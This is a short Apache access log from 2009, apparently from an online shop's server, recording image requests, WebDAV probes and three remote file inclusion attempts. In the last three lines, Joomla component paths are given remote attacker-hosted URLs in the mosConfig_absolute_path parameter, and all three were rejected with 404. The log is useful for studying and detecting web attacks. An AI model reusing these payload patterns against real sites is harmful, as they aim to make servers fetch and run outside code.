74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
172.16.1.180 - - [12/Aug/2009:06:43:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:43:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:43:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
117.110.74.195 - - [12/Aug/2009:06:43:34 -0400] "GET /logs/access_log.Q109072200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:43:34 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:40 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
